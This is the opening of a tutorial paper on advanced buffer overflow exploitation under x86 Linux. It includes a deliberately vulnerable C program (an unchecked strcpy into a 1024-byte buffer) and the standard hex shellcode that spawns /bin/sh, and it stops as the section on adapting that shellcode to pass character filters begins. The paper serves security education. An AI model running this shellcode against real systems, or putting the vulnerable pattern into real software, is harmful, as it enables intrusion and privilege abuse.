 Advanced buffer overflow exploit


 Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
----------------------------------------------------------------------------


1. Introduction
 Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploit codes only spawn a shell ( execute /bin/sh ). However,
nowadays some of the buffer overflow exploit codes have very nice features.
For example, passing through filtering, opening a socket, breaking chroot,
and so on. This paper will attempt to explain the advanced buffer overflow
exploit skill under intel x86 linux.

2. What do you have to know before reading?
 You have to know assembly language, C language, and Linux. Of course, you
have to know what buffer overflow is. You can get the information of the
buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend
you to read that before reading this one.

3. Pass through filtering
 There are many programs which has buffer overflow problems. Why are not the
all buffer overflow problems exploited? Because even if a program has a buffer
overflow condition, it can be hard to exploit. In many cases, the reason is
that the program filters some characters or converts characters into other
characters. If the program filters all non printable characters, it's too
hard to exploit. If the program filters some of characters, you can pass
through the filter by making good buffer overflow exploit code. :)

3.1 The example vulnerable program

vulnerable1.c
----------------------------------------------------------------------------
#include<string.h>
#include<ctype.h>

int main(int argc,int **argv)
{
	char buffer[1024];
	int i;
	if(argc>1)
	{
		for(i=0;i<strlen(argv[1]);i++)
			argv[1][i]=toupper(argv[1][i]);
		strcpy(buffer,argv[1]);
	}
}
----------------------------------------------------------------------------

 This vulnerable program converts small letters into capital letters of the
user input. Therefore, you have to make a shellcode which doesn't contain any
small letters. How can you do that? You have to reference the character string
"/bin/sh" which must contain small letters. However, you can exploit this. :)

3.2 Modify the normal shellcode
 Almost all buffer overflow exploit code uses this shellcode. Now you have
to remove all small letters in the shellcode. Of course, the new shellcode
has to execute a shell.

normal shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

 